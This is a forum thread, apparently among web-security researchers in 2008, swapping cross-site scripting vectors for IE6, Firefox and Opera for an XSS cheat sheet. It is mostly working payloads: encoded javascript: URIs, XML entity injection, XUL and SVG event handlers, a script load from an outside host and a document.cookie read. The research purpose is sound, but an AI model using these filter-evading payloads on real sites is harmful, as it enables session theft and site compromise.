DOM Redressing in IE6-8b2

<form id="location" href="bar">  

@mario

Yep saw that post. Awesome stuff :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

have u guys tried with document.domain using this dom redressing stuff?
I dont have access to windows right now, but it sounds to me like something to test, and noone has commented about it yet

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Yep - apparently it doesn't circumvent the SOP.

Anway - I found this one fun:

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns="http://www.w3.org/1999/xhtml" 
      xmlns:svg="http://www.w3.org/2000/svg">
<svg:g onload="alert(8)"/>
</html>

<html xmlns:ø="http://www.w3.org/1999/xhtml">
    <ø:script src="//0x.lv/" />
</html>

Opera, Safari, Chrome, FF2, FF3...

oooooo pretty damn awesome mario

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

//IE only
document.body.runtimeStyle.cssText = '1:expression(alert(1))'

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Gareth Heyes Wrote:
-------------------------------------------------------
> x='aler\u200ft(1)'
> eval(x)

I need help with this and similar ones. They don't seem to do anything in my browsers.

<script>
x='aler\u200ft(1)'
eval(x)
</script>

Does nothing? Did I miss the point?

This one works for me: <object data=jav&#x61script:\u0061lert(2)>

I have a new vector for the cheat sheet and want to make sure I understand the thread before I say something ;)

New kid on the block! :)

The \uXXXX stuff usually works in Gecko browsers. Some of the vectors only work on Firefox 2. The one you mentioned above doesn't work for me either - neither on FF2.0.0.18 W32 nor on FF3.0.4 Linux - but probably on earlier versions.

So - what about the new submission for the cheat sheet? :)

Ah - and some more vector fast food (FF2/3, UTF-8)

µ=<µ ß='le' µ='a' ø='rt'></µ>,top[µ.@µ+µ.@ß+µ.@ø](µ)

@robert

I can't even remember that one :) I think it might have been a Firefox 2 vector. Could have been fixed now. I think it was a character that was ignored in JS so it was possible to pad chars.

Could be related to this:-
http://www.mozilla.org/security/announce/2008/mfsa2008-43.html

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

This works in FF3
x='\u0020alert\u0009(1)';
eval(x);

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Why Firefox, why...

<xul:image 
    onerror="alert(document.cookie)" 
    src="x" 
    xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
/>

more info

Simply because they like our thread and want to see more :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Only logical explanation :) But seriously - what sense does it make to allow certain XUL elements with inline namespaces inside regular XHTML documents - in case the namespace URI points to the default XUL file??

Perhaps their idea is to replace XHTML with XUL. Personally I think XUL sucks because I didn't like it when I played with it.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

mario & Gareth, thanks I'm glad it wasn't just me.

The breakthrough I thought I had for the cheat sheet didn't pan out. At least I didn't make an ass of myself by publishing an untested exploit.

As a small consolation prize, I do have a variation for you.

The cheat sheet says this doesn't work in FF:

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115....>

But if you combine this vector with the iframe vector it works perfectly in FF, IE, OP. Also note the unclosed tag.

<iframe SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+1/+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ++alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

linear and exponential growth

data:text/html,<script>location+=1</script>

data:text/html,<script>location+=location</script>

//FF only

x=function()'ale'
~(1)
y=function()'rt'
~(1)
a getter=x
b getter=y
document.defaultView[a+b]
(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Good old XXE - almost older than me (and I am damn old *g*)

<!DOCTYPE html PUBLIC "" "" [
  <!ENTITY copy "<script>alert(1)</script>">
  <!ENTITY auml "<script>alert(2)</script>">
]>
<html xmlns="http://www.w3.org/1999/xhtml">
    &copy;
    &auml;
</html>

(all W3C browsers - only XML docs)


And some more XML fun

<img:img 
    xmlns:img="http://www.w3.org/1999/xhtml" 
    src="" 
    onerror="alert(this)" 
/>

(FF2-3)

Gareth, .mario, those past few posts have got some good stuff! Never knew you could define an entity...
Also, good (well, probably bad) to see some new XML vectors coming out of this thread.

-Dan

@DoctorDan: Yep - XML is like pandora's box. I was talking to a friend of mine working as webdev and told him that I see a lot of potential for vulnerabilities in MathML and he said he doesn't see why. Some days later.. FF3.0.4 crash bug via MathML on FD. Another example: the recent IE5-8 exploit - XML data islands. The inline namespaces in the examples above circumvent most self coded filters and most browsers support features a high percentage of webdevs doesn't even know they exist.

I was doing a talk some days ago about those issues (Here are the slides - German language but a lot of code, English version on request *g*) and most of the stuff I talked about wasn't known by any person in the whole room. Needless to say all guys present were excellent developers with combined experience of like 50-100 years.

There's a lot of weird stuff coming - and almost the same amount of stuff being already there. Funny 2009 it will be :)

@mario

You can actually encode the entities like I posted before :P

http://www.businessinfo.co.uk/labs/xml_injection/inject.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [
<!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">
]>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Test</title>
</head>

<body>
&inject;
</body>
</html>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Nice! I wonder if it's possible to somehow overwrite entities like &lt; or &gt; using extravagant encodings or using SYSTEM entities - using plain text doesn't work so far.

haha you had the same idea as me :) I found that custom entities didn't work in the browsers unless they were XML :( Maybe it's different now because we have inline namespaces

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

//FF only
window[[['alert',],]](1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 12/28/2008 03:03PM by Gareth Heyes.

location.assign('\u000ahttp\u003a/\u000a/p42.us')

Fun with IE6

<img src=`&#14&#106&#97va&#9&#115&#99ript&#58ale&#114t&#47&#x2a&#102" alt="" />

<div id=&#42&#x2f&#13&#40&#47
XSS1
&#47&#46source&#41
<alert(/xss2/)
<!-- alert(/WTF XSS3/)`-->

I wanted to see how many cheats I could combine with irrelevant obfuscation. In the attempt, I executed multiple statements without semicolons.

//FF only
o={"b"getter:Function('alert(1)')},o.b

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]